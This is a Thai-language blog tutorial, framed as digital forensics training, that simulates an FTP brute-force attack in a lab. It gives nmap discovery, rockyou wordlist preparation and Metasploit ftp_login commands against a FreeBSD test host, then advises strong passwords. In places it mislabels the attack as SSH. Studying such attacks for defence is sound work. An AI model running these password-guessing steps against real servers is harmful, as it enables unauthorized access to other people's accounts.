DIGITAL FORENSICS: BRUTE FORCE ATTACK FTP
การทำ Brute Force Attack คือการสุ่มรหัสผ่าน “ทุกความเป็นไปได้” จนกว่าจะเจาระบบได้ โดยเริ่มจากรหัสผ่านที่ ง่ายก่อน อาชญากรจะใช้โปรแกรมที่ทำงานอัตโนมัติในการสุ่ม และอาจใช้คอมพิวเตอร์ของผู้อื่นที่ตนสามารถควบคุมได้จากทางไกล (หรือที่เราเรียกว่าเครื่องคอมพิวเตอร์ “ซอมบี้”) ในการช่วยสุ่มเพื่อให้สามารถเจาะระบบได้เร็วขึ้น วิธีป้องกันคือตั้งรหัสผ่านที่แข็งแรง เครดิตข้อมูล บรรยายสาธารณะ “กระบวนการแสวงหาและพิสูจน์พยานหลักฐานดิจิทัลเชิงเทคนิค”
FTP (File Transfer Protocol) คือโพรโทคอลที่ออกแบบมาเพื่อใช้ในการรับส่งไฟล์ระหว่าง Client และ Server โดยจะมีพอร์ตที่ใช้งานอยู่ 2 พอร์ต คือ พอร์ต 20 ใช้ในการรับส่งไฟล์ ส่วนอีกพอร์ตคือ พอร์ต 21 ใช้ในการควบคุมหรือส่งคำสั่ง FTP เช่น ตรวจสอบการเข้าถึงโปรแกรมจากผู้ใช้งาน เป็นต้น และในปัจจุบัน ผู้ให้บริการ Web hosting โดยส่วนใหญ่มักจะให้บริการแลกเปลี่ยนไฟล์ผ่าน FTP Server เพราะการการติดตั้งระบบและการบริหารจัดการไฟล์ทำได้ง่าย
เนื่องจาก FTP เป็นโพรโตคอลที่รับส่งข้อมูลโดยไม่มีการเข้ารหัสลับ จึงทำให้ข้อมูลที่รับส่ง ไม่ว่าจะเป็น Username หรือ Password สามารถถูกดักรับ (Sniff) จากผู้ไม่หวังดีได้ [1] ซึ่งวิธีการแก้ไขนั้น ผู้ดูแลระบบควรเปลี่ยนมาใช้โพรโทคอลสำหรับแลกเปลี่ยนข้อมูลที่มีการเข้ารหัสลับข้อมูลที่รับส่งเสมอ ซึ่งมีโพรโทคอลที่ถูกออกแบบมาเพื่อแก้ปัญหาดังกล่าว คือ FTPS [2] เครดิตข้อมูล thaicert
ในทางการพิสูจน์หลักฐานผู้สืบสวนควรศึกษาวิธีการและเครื่องมือที่ใช้งานเพื่อประโยชน์ในการค้นหาหลักฐาน
สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)
- nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด IP Address , port, service, os เป็นต้น
- wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ
- Kali คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ โดยใช้ Metasploit คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing)
- FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี
Step 1
- nmap –sn 192.168.233.0/24
IP ทำการตรวจสอบ IP address ของเครื่องก่อน
Step 2
- บน Kali ทำการเตรียม wordlists Rockyou
ls -l /usr/share/wordlists/
cd /usr/share/wordlists/
gunzip rockyou.txt.gz ทำการแตกซิป
Step 3
- Kali ใช้โปรแกรม Metasploit
#Msfconsole
search ftp_login
use auxiliary/scanner/ftp/ftp_login
show options
- msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
- msf auxiliary(ftp_login) > set RHOSTS 192.168.233.133
- msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true
- msf auxiliary(ftp_login) > set threads 8
- msf auxiliary(ftp_login) > set USERnAME ladda
- msf auxiliary(ftp_login) > set verbose true
- msf auxiliary(ftp_login) > run
- FreeBSD 192.168.233.133 หน้าจอแสดงเครื่องเป้าหมายที่ถูกทดสอบการโจมตี Brute Force Attack FTP พบว่ามีการพยายาม login และรหัสผิดหลายครั้ง
Step 4
- บน Kali ให้ใช้งาน FTP ทำการนำ user และ password ที่ได้ไป login ระบบ
#FTP ladda@192.168.233.133
อ่านเพิ่มเติม BRUTE FORCE ATTACK SSH
สรุป
จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย
detect-ftp-brute-force-attack/
#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล
หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น
* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ
หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น
* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ
No comments:
Post a Comment